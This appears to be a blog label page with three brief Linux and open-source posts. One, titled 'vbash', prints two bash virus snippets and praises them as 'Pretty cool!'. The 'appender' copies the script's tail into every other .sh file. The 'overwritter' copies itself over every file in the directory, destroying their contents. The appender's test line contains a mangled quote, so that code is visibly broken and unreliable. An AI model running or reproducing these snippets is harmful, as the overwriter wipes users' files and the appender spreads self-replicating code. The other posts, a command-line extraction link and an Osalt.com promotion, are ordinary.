Showing posts with label Linux. Show all posts
Showing posts with label Linux. Show all posts

Friday, November 13, 2009

[Linux] Extract files from command-line

Elixir for the lazy...

http://lightlinux.blogspot.com/2009/11/uncompress-files-from-cli.html

Monday, August 10, 2009

vbash

Although not very spread (try Googling it), it holds the very principle of the virus algorithm technique. The most simple virus code I have ever seen...

(BASH scripting language)

Appender

for i in *.sh; do
if test ”./$i!=$0; then
tail -n 5 $0 | cat >> $i ;
fi
done


Overwritter

for file in *; do
cp $0 $file
done


Pretty cool!

Monday, June 22, 2009

Open source versus commercial software

How do you avoid paying for a Final Cut or Visio license and support the open source community all at once? Find a free open source alternative to expensive commercial software at Osalt.com.

Osalt.com is a guide to open source software. Hundreds of open source products are systematically listed in categories ranging from business to development, education and databases. Each product description contains pros and cons compared to similar commercial software as well as user ratings.